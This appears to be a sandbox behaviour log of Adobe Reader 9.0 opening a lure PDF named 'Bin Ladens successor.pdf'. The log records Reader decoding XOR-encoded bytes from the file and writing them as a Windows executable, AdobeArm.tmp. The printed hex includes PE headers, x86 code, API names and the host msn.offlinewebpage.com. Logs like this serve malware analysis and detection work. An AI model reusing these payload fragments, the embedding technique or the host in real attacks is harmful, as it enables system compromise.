Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2058807319
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2058901924
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2058904203
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2058997464
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2058999740
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2059515649
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2059522093
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2059713102
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2059719550
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 102400 Protection: readonly Mapped to pid: own pid	success or wait	2059883164
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 102400 Protection: readonly Mapped to pid: own pid	success or wait	2059889730
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2060050805
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2060057228
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2060962128
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2060968662
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2060995610
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\ZX______.PFB Access: query and read Type: commit Baseaddress: 4160000 Size: 77824 Protection: readonly Mapped to pid: own pid	success or wait	2061045288
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\ZY______.PFB Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2061086096
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-H Access: query and read Type: commit Baseaddress: 3FE0000 Size: 8192 Protection: readonly Mapped to pid: own pid	success or wait	2061441758
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\CMap\Identity-V Access: query and read Type: commit Baseaddress: 3FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid	success or wait	2061490225
Section loaded	Path: \KnownDlls\ATMLIB.dll Access: write and read and execute Type: unknown Baseaddress: 3FE0000 Size: 4096 Protection: readonly Mapped to pid: own pid	object name not found	2061495370
Section loaded	Path: C:\WINDOWS\system32\atmlib.dll Access: query and write and read and execute Type: image Baseaddress: 73C20000 Size: 45056 Protection: read write Mapped to pid: own pid	success or wait	2061500002
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2061541934
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Oblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2061546104
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-Bold.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2061550165
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\CourierStd-BoldOblique.otf Access: query and read Type: commit Baseaddress: 3FE0000 Size: 40960 Protection: readonly Mapped to pid: own pid	success or wait	2061554225
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\SY______.PFB Access: query and read Type: commit Baseaddress: 3FE0000 Size: 36864 Protection: readonly Mapped to pid: own pid	success or wait	2061560877
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\AdobePiStd.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 90112 Protection: readonly Mapped to pid: own pid	success or wait	2061571595
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2061575643
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2061579779
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 278528 Protection: readonly Mapped to pid: own pid	success or wait	2061583838
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MinionPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 233472 Protection: readonly Mapped to pid: own pid	success or wait	2061587884
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Bold.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2061591916
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-BoldIt.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 102400 Protection: readonly Mapped to pid: own pid	success or wait	2061596342
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-It.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2061600759
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Resource\Font\MyriadPro-Regular.otf Access: query and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	success or wait	2061604953
Section loaded	Path: \BaseNamedObjects\Local\UrlZonesSM_Administrator Access: query and write and read Type: commit Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	object name exists	2063307901
Section loaded	Path: \KnownDlls\BIBUtils.dll Access: write and read and execute Type: unknown Baseaddress: 4160000 Size: 98304 Protection: readonly Mapped to pid: own pid	object name not found	2081300516
Section loaded	Path: C:\Program Files\Adobe\Reader 9.0\Reader\BIBUtils.dll Access: query and write and read and execute Type: image Baseaddress: 4FB0000 Size: 167936 Protection: read write Mapped to pid: own pid	conflicting addresses	2081303444
Section loaded	Path: none Access: query and write and read and execute Type: commit Baseaddress: 4FE0000 Size: 65536 Protection: execute and read and write Mapped to pid: own pid	success or wait	2081506206
File created	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Access: read attributes and synchronize and generic read and generic write Options: synchronous io non alert and non directory file Attributes: normal Content Overwritten: false	success or wait	2081510170
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 4D 48 82 12 11 12 12 12 16 12 12 12 ED ED 12 12 AA 12 12 12 12 12 12 12 52 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 CA 12 12 12 1C 0D A8 1C 12 A6 1B DF 33 AA 13 5E DF 33 46 7A 7B 61 32 62 60 7D 75 60 73 7F 32 71 73 7C 7C 7D 66 32 70 77	success or wait	2081513806
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 4D 5A 90 00 03 00 00 00 04 00 00 00 FF FF 00 00 B8 00 00 00 00 00 00 00 40 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 D8 00 00 00 0E 1F BA 0E 00 B4 09 CD 21 B8 01 4C CD 21 54 68 69 73 20 70 72 6F 67 72 61 6D 20 63 61 6E 6E 6F 74 20 62 65	success or wait	2081514846
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 47 99 FE AA 06 30 12 12 FA 11 1B 12 12 41 44 45 AB 50 12 12 12 AC 02 22 52 12 9F AF 46 F4 ED ED 9F 97 9A E1 ED ED E1 B7 42 FA A0 17 12 12 91 D6 16 97 D2 1D 96 58 16 12 12 AB 92 12 12 12 21 D2 9F AF A2 E9 ED ED 9F 87 A2 E9 ED ED E1 B9 9F 5F EA D5 57 EA 12 13 12 12 43 40 ED 07 12 32 52 12 99 27 3A 32	success or wait	2081515998
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 55 8B EC B8 14 22 00 00 E8 03 09 00 00 53 56 57 B9 42 00 00 00 BE 10 30 40 00 8D BD 54 E6 FF FF 8D 85 88 F3 FF FF F3 A5 50 E8 B2 05 00 00 83 C4 04 85 C0 0F 84 4A 04 00 00 B9 80 00 00 00 33 C0 8D BD B0 FB FF FF 8D 95 B0 FB FF FF F3 AB 8D 4D F8 C7 45 F8 00 01 00 00 51 52 FF 15 00 20 40 00 8B 35 28 20	success or wait	2081517095
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 52 12 9F 97 E2 EF ED ED 78 12 9F 9F B2 E5 ED ED 42 43 ED C4 FB D1 12 12 12 99 27 92 32 52 12 78 76 ED C4 78 76 ED C4 9F 87 C6 F4 ED ED 40 FA DF 12 12 12 91 D6 16 9B 97 96 E1 ED ED 97 D2 66 CD 9F 97 66 FF ED ED 42 ED 07 9A 32 52 12 97 D2 66 3C 7A 0A 23 52 12 42 ED 07 9E 32 52 12 99 E2 97 E4 66 0E 9F	success or wait	2081517198
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 40 00 8D 85 F0 FD FF FF 6A 00 8D 8D A0 F7 FF FF 50 51 FF D6 E9 C3 00 00 00 8B 35 80 20 40 00 6A 64 FF D6 6A 64 FF D6 8D 95 D4 E6 FF FF 52 E8 CD 00 00 00 83 C4 04 89 85 84 F3 FF FF 85 C0 74 DF 8D 85 74 ED FF FF 50 FF 15 88 20 40 00 85 C0 74 2E 68 18 31 40 00 50 FF 15 8C 20 40 00 8B F0 85 F6 74 1C 8D	success or wait	2081518332
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 36 06 2E 12 12 12 D5 56 36 32 EE 23 52 12 9B 46 36 36 9B 56 36 3A D5 56 36 0A 52 12 12 12 ED C5 99 27 7A 32 52 12 42 ED C4 99 0F 76 32 52 12 78 1D ED C1 99 3F 72 32 52 12 42 ED C7 9F 5E 36 02 43 ED 07 FE 32 52 12 97 D2 66 53 99 46 36 5A 78 52 40 ED C4 99 56 36 5A 78 13 42 ED 07 4E 32 52 12 9F 5E 36	success or wait	2081518433
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 24 14 3C 00 00 00 C7 44 24 20 FC 31 40 00 89 54 24 24 89 44 24 28 C7 44 24 18 40 00 00 00 FF D7 8B 35 68 20 40 00 50 FF D6 8B 1D 64 20 40 00 6A 0F FF D3 8B 2D 60 20 40 00 50 FF D5 8D 4C 24 10 51 FF 15 EC 20 40 00 85 C0 74 41 8B 54 24 48 6A 40 52 FF D6 8B 44 24 48 6A 01 50 FF 15 5C 20 40 00 8D 4C 24	success or wait	2081519485
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 84 34 12 12 12 12 12 12 4E 31 12 12 7A 31 12 12 68 31 12 12 94 31 12 12 88 31 12 12 A2 31 12 12 AE 31 12 12 DA 31 12 12 C6 31 12 12 F2 31 12 12 E0 31 12 12 16 36 12 12 32 36 12 12 22 36 12 12 54 31 12 12 58 36 12 12 4A 36 12 12 7A 36 12 12 64 36 12 12 94 36 12 12 8A 36 12 12 BA 36 12 12 D0 36 12 12	success or wait	2081519585
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 96 26 00 00 00 00 00 00 5C 23 00 00 68 23 00 00 7A 23 00 00 86 23 00 00 9A 23 00 00 B0 23 00 00 BC 23 00 00 C8 23 00 00 D4 23 00 00 E0 23 00 00 F2 23 00 00 04 24 00 00 20 24 00 00 30 24 00 00 46 23 00 00 4A 24 00 00 58 24 00 00 68 24 00 00 76 24 00 00 86 24 00 00 98 24 00 00 A8 24 00 00 C2 24 00 00	success or wait	2081520628
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 61 66 45 12 7E 12 51 60 77 73 66 77 46 7D 7D 7E 7A 77 7E 62 21 20 41 7C 73 62 61 7A 7D 66 12 12 F2 13 55 77 66 44 77 60 61 7B 7D 7C 57 6A 45 12 E7 13 55 7E 7D 70 73 7E 54 60 77 77 12 12 85 11 45 60 7B 66 77 54 7B 7E 77 12 42 12 51 60 77 73 66 77 54 7B 7E 77 45 12 49 10 5E 7D 71 79 40 77 61 7D 67 60	success or wait	2081521567
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 73 74 57 00 6C 00 43 72 65 61 74 65 54 6F 6F 6C 68 65 6C 70 33 32 53 6E 61 70 73 68 6F 74 00 00 E0 01 47 65 74 56 65 72 73 69 6F 6E 45 78 57 00 F5 01 47 6C 6F 62 61 6C 46 72 65 65 00 00 97 03 57 72 69 74 65 46 69 6C 65 00 50 00 43 72 65 61 74 65 46 69 6C 65 57 00 5B 02 4C 6F 63 6B 52 65 73 6F 75 72	success or wait	2081522614
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 7F 12 61 12 7C 12 3C 12 7D 12 74 12 74 12 7E 12 7B 12 7C 12 77 12 65 12 77 12 70 12 62 12 73 12 75 12 77 12 3C 12 71 12 7D 12 7F 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 7F 12 61 12 7C 12 3C 12 7D 12 74 12 74 12 7E 12 7B 12 7C 12	success or wait	2081522717
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6D 00 73 00 6E 00 2E 00 6F 00 66 00 66 00 6C 00 69 00 6E 00 65 00 77 00 65 00 62 00 70 00 61 00 67 00 65 00 2E 00 63 00 6F 00 6D 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6D 00 73 00 6E 00 2E 00 6F 00 66 00 66 00 6C 00 69 00 6E 00	success or wait	2081523742
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 12 12 12 12 12 12 12 12 12 12 12 13 12 13 12 B2 12 12 92 32 12 12 92 02 12 12 12 2A 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 74 12 12 12 42 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 13 12 12 12 7A 12 12 92 12 12 12 12 12 12 12 12 12 12 12 12 12 12 13 12 1B 16 12 12	success or wait	2081523842
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 A0 00 00 80 20 00 00 80 10 00 00 00 38 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 66 00 00 00 50 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 01 00 00 00 68 00 00 80 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 09 04 00 00	success or wait	2081524873
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12 12	success or wait	2081524972
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00	success or wait	2081526041
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 99 3F AE 62 12 02 4B 91 6E 36 06 12 66 5E 44 78 12 ED 66 36 0E FA 46 5E 12 12 ED 66 36 32 FA 05 19 12 12 91 D6 02 ED 66 36 06 ED C7 99 C2 41 9B 46 36 06 ED C7 99 5E 36 02 11 DA 93 EB ED ED 12 12 6F 15 ED 66 36 06 41 ED C5 ED 66 36 06 FA 35 5E 12 12 99 3F AE 62 12 02 4B 91 6E 36 0A 12 66 5E 44 78 12	success or wait	2081526180
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 8B 2D BC 70 00 10 59 83 7C 24 14 00 74 4C 56 6A 00 FF 74 24 1C E8 54 4C 00 00 FF 74 24 20 E8 17 0B 00 00 83 C4 10 FF 74 24 14 FF D5 8B D0 53 89 54 24 14 FF D5 8B 4C 24 10 03 C8 81 F9 FF FF 00 00 7D 07 FF 74 24 14 53 FF D7 FF 74 24 14 E8 27 4C 00 00 8B 2D BC 70 00 10 59 83 7C 24 18 00 74 4C 56 6A 00	success or wait	2081527288
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 12 6F 23 9F 97 E2 EF ED ED 42 ED 67 1A ED 07 A6 62 12 02 ED 57 EA 44 44 44 9F 57 E6 44 42 9F 97 E2 E9 ED ED 42 D5 57 E6 12 10 12 12 ED 67 EA ED 67 EE F9 97 ED 67 EE ED 07 0A 62 12 02 4D 49 4C DB D1 47 99 FE 91 FE 3A 9F 57 EE 42 7A 0B 12 10 12 78 12 7A 2A 97 12 02 7A 10 12 12 92 ED 07 06 62 12 02	success or wait	2081527390
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 00 7D 31 8D 85 F0 FD FF FF 50 FF 75 08 FF 15 B4 70 00 10 FF 45 F8 56 56 56 8D 45 F4 56 50 8D 85 F0 FB FF FF 50 C7 45 F4 00 02 00 00 FF 75 F8 FF 75 FC EB 85 FF 75 FC FF 15 18 70 00 10 5F 5B 5E C9 C3 55 8B EC 83 EC 28 8D 45 FC 50 68 19 00 02 00 6A 00 68 38 85 00 10 68 02 00 00 80 FF 15 14 70 00 10	success or wait	2081528467
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 02 43 9F 5F EA 43 9F 5F E2 43 9F 9F FA BD ED ED 7A 12 5A 12 12 43 78 11 78 22 42 9B 4F E2 9B 4F EA 9B 4F FA ED C4 97 D2 67 3F 99 57 E2 9F 5F FA 43 9F 5F EA 43 9F 5F E2 17 12 5A 12 12 43 42 9F 97 FA BD ED ED 42 78 11 78 22 ED 67 FE ED C4 97 D2 1D 96 86 13 12 12 7A 8A 9A 12 02 7A 9A 9A 12 02 7A 62	success or wait	2081528567
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 10 51 8D 4D F8 51 8D 4D F0 51 8D 8D E8 AF FF FF 68 00 48 00 00 51 6A 03 6A 30 50 89 5D F0 89 5D F8 89 5D E8 FF D6 85 C0 75 2D 8B 45 F0 8D 4D E8 51 8D 4D F8 51 8D 4D F0 05 00 48 00 00 51 50 8D 85 E8 AF FF FF 50 6A 03 6A 30 FF 75 EC FF D6 85 C0 0F 84 94 01 00 00 68 98 88 00 10 68 88 88 00 10 68 70	success or wait	2081529653
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 9B 4F EA 42 9F 97 FA EF ED ED 42 45 45 7A 86 9B 12 02 ED 67 E2 ED 07 12 62 12 02 97 D2 1D 97 A9 10 12 12 9F 97 FA EF ED ED 7A 06 58 10 02 42 ED 07 22 62 12 02 97 D2 1D 96 B3 10 12 12 9F 97 FA EF ED ED 7A 9A 9B 12 02 42 ED C4 9F 97 FA EF ED ED 42 ED 67 1A ED C4 7A 42 10 12 12 9F 97 8A E9 ED ED 45 42	success or wait	2081529753
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 89 5D F8 50 8D 85 E8 FD FF FF 50 57 57 68 94 89 00 10 FF 75 F0 FF 15 00 70 00 10 85 C0 0F 85 BB 02 00 00 8D 85 E8 FD FF FF 68 14 4A 02 10 50 FF 15 30 70 00 10 85 C0 0F 84 A1 02 00 00 8D 85 E8 FD FF FF 68 88 89 00 10 50 FF D6 8D 85 E8 FD FF FF 50 FF 75 08 FF D6 68 50 02 00 00 8D 85 98 FB FF FF 57 50	success or wait	2081530838
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 12 1D 94 C9 13 12 12 91 D2 1E 9B 57 EE 99 57 EE 41 78 12 99 52 EA 9B 57 FE 9F 97 AA E9 ED ED 42 FA 5B 2E 12 12 91 D6 1E ED 67 FE ED 07 6E 63 12 02 42 9F 97 AA E9 ED ED 7A 02 9E 12 02 42 FA 9B 2E 12 12 45 9F 97 AA E1 ED ED 78 12 42 FA 0E 2E 12 12 9F 97 AA E9 ED ED 42 FA 04 2E 12 12 42 9F 97 AA E9 ED	success or wait	2081530976
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 00 0F 86 DB 01 00 00 83 C0 0C 89 45 FC 8B 45 FC 53 6A 00 8B 40 F8 89 45 EC 8D 85 B8 FB FF FF 50 E8 49 3C 00 00 83 C4 0C FF 75 EC FF 15 7C 71 00 10 50 8D 85 B8 FB FF FF 68 10 8C 00 10 50 E8 89 3C 00 00 57 8D 85 B8 F3 FF FF 6A 00 50 E8 1C 3C 00 00 8D 85 B8 FB FF FF 50 E8 16 3C 00 00 50 8D 85 B8 FB FF	success or wait	2081532070
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: ED ED 42 FA AC 2A 12 12 91 D6 3E 9F 97 AA E1 ED ED 42 ED 67 1A ED C4 ED 57 EA 99 57 E2 99 5F EA 91 57 EE 06 29 1A 1D 90 9D EC ED ED 99 57 E2 42 FA 57 2A 12 12 4B 4D 4C 49 DB D1 47 99 FE 93 FE 86 1B 12 12 41 44 45 21 C9 AB ED 13 12 12 21 D2 9F AF 7C E4 ED ED 99 27 A6 62 12 02 74 9B 8F 7E E4 ED ED 7A	success or wait	2081532170
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: FF FF 50 E8 BE 38 00 00 83 C4 2C 8D 85 B8 F3 FF FF 50 FF 75 08 FF D6 FF 45 F8 8B 45 F0 8B 4D F8 83 45 FC 14 3B 08 0F 82 8F FE FF FF 8B 45 F0 50 E8 45 38 00 00 59 5F 5E 5B C9 C3 55 8B EC 81 EC 94 09 00 00 53 56 57 33 DB B9 FF 01 00 00 33 C0 8D BD 6E F6 FF FF 8B 35 B4 70 00 10 66 89 9D 6C F6 FF FF 68	success or wait	2081533261
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 49 DB D1 47 99 FE 91 FE 26 41 44 45 78 32 ED 67 1A 9F 57 DE 21 E4 42 9B 67 EE FA D7 26 12 12 91 D6 1E 9F 5F EE 9B 67 C2 78 10 4A 43 9F 5F DE 43 44 44 42 9B 57 DE 9B 57 CA FA D8 25 12 12 97 D2 1D 97 8A 12 12 12 2B 67 EE 1D 96 9D 12 12 12 91 5F EA ED AA 12 3A 12 12 42 9B 57 E2 FA 6F 26 12 12 99 EA 4B	success or wait	2081533360
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 5B C9 C3 55 8B EC 83 EC 34 53 56 57 6A 20 FF 75 08 8D 45 CC 33 F6 50 89 75 FC E8 C5 34 00 00 83 C4 0C 8D 4D FC 89 75 D0 6A 02 58 51 8D 4D CC 51 56 56 50 89 45 CC 89 45 D8 E8 CA 37 00 00 85 C0 0F 85 98 00 00 00 39 75 FC 0F 84 8F 00 00 00 83 4D F8 FF B8 00 28 00 00 50 89 45 F0 E8 7D 34 00 00 8B F8 59	success or wait	2081534446
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: E5 EB 91 D0 53 74 9B 05 55 55 ED 5F 1A 67 A4 4D 74 91 36 61 12 7A 1A 10 12 12 9F 97 FA EF ED ED 78 12 42 FA 54 22 12 12 91 D6 1E 9F 97 FA EF ED ED 41 42 ED 07 A2 62 12 02 ED 67 1E 9F 97 FA EF ED ED 42 7A CA 9F 12 02 41 FA 60 22 12 12 91 D6 02 4C 49 DB D1 47 99 FE 93 FE 7E 1A 12 12 41 44 AC ED ED 12	success or wait	2081534545
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: F7 F9 83 C2 41 66 89 17 47 47 FF 4D 08 75 B6 5F 66 83 24 73 00 68 08 02 00 00 8D 85 E8 FD FF FF 6A 00 50 E8 46 30 00 00 83 C4 0C 8D 85 E8 FD FF FF 53 50 FF 15 B0 70 00 10 FF 75 0C 8D 85 E8 FD FF FF 50 68 D8 8D 00 10 53 E8 72 30 00 00 83 C4 10 5E 5B C9 C3 55 8B EC 81 EC 6C 08 00 00 53 56 BE FF FF 00	success or wait	2081535624
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: 91 F3 11 91 F2 1D D3 F3 16 19 D3 4B 99 E1 9F AF 76 ED ED ED E1 B7 B6 6E 1C 91 EA 52 6F 1B 98 96 17 76 ED ED ED F9 10 A2 2F 1D AC D2 9B 57 FE 99 D0 D3 FA 1A 99 D8 91 F2 1D D3 FB 04 D3 F2 10 91 F3 11 78 02 19 D3 4B 99 E1 9F AF 32 ED ED ED E1 B7 B6 6E 1C 91 EA 52 6F 1B 98 96 17 32 ED ED ED F9 10 A2 2F	success or wait	2081536172
File write	Path: C:\DOCUME~1\ADMINI~1\LOCALS~1\Temp\AdobeArm.tmp Offset: none Length: 1024 Value: 83 E1 03 83 E0 0F C1 E1 04 0B C1 59 8B F3 8D BD 64 FF FF FF F3 A5 A4 7C 0E 83 F8 40 7D 09 8A 84 05 64 FF FF FF EB 02 B0 3D 0F BE C0 89 45 EC 8B C2 C1 E8 08 8B CA 83 E0 0F C1 E9 16 C1 E0 02 83 E1 03 6A 10 0B C1 59 8B F3 8D BD 20 FF FF FF F3 A5 A4 7C 0E 83 F8 40 7D 09 8A 84 05 20 FF FF FF EB 02 B0 3D	success or wait	2081537267
File read	Path: C:\Bin Ladens successor.pdf Offset: none Length: 1024 Value: ED ED 4B 4B 9F 97 76 F8 ED ED 9F 5F F6 42 7A 12 12 52 16 ED 67 1E ED 67 1A FA BB 1E 12 12 97 D2 1D 96 4F 13 12 12 9F 57 F2 41 42 9F 57 E2 42 7A 17 12 12 32 ED 67 FE D5 57 F2 16 12 12 12 ED 07 62 63 12 02 97 D2 1D 96 25 13 12 12 99 57 E2 52 42 FA 38 3A 12 12 99 EA 4B 29 E9 1D 96 30 13 12 12 99 57 E2	success or wait	2081537368
